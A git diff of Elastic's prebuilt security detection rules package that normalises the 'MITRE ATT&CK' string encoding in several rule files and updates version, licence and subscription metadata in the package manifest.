a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_5.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_5.json index 3da05a000c3..95ca80c567b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_5.json +++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_5.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_101.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_101.json index da4ac0419e3..f07bdff08e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_101.json +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_102.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_102.json index 153692938d4..dbe867c08d4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_103.json b/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_103.json index 4149063618e..2b681fe8348 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_103.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_104.json b/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_104.json index 0ebf7cf18f8..844b20c3b18 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_1.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_1.json index b5c920b87b1..20882b870ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_1.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_2.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_2.json index a476b434b75..b9d0a6d8203 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_2.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_3.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_3.json index 6545c5fb4f1..550e7487f17 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_3.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_4.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_4.json index 2c28bc4d597..c38fb93df02 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_4.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml index d4857e2a72f..92b2e9455e2 100644 --- a/packages/security_detection_engine/manifest.yml +++ b/packages/security_detection_engine/manifest.yml @@ -1,18 +1,22 @@ categories: - security conditions: - kibana.version: ^8.11.0 + elastic: + subscription: basic + kibana: + version: ^8.12.0 description: Prebuilt detection rules for Elastic Security -format_version: 1.0.0 +format_version: 3.0.0 icons: - size: 16x16 src: /img/security-logo-color-64px.svg type: image/svg+xml -license: basic name: security_detection_engine owner: github: elastic/protections -release: ga + type: elastic +source: + license: Elastic-2.0 title: Prebuilt Security Detection Rules type: integration -version: 8.11.4 +version: 8.12.1-beta.1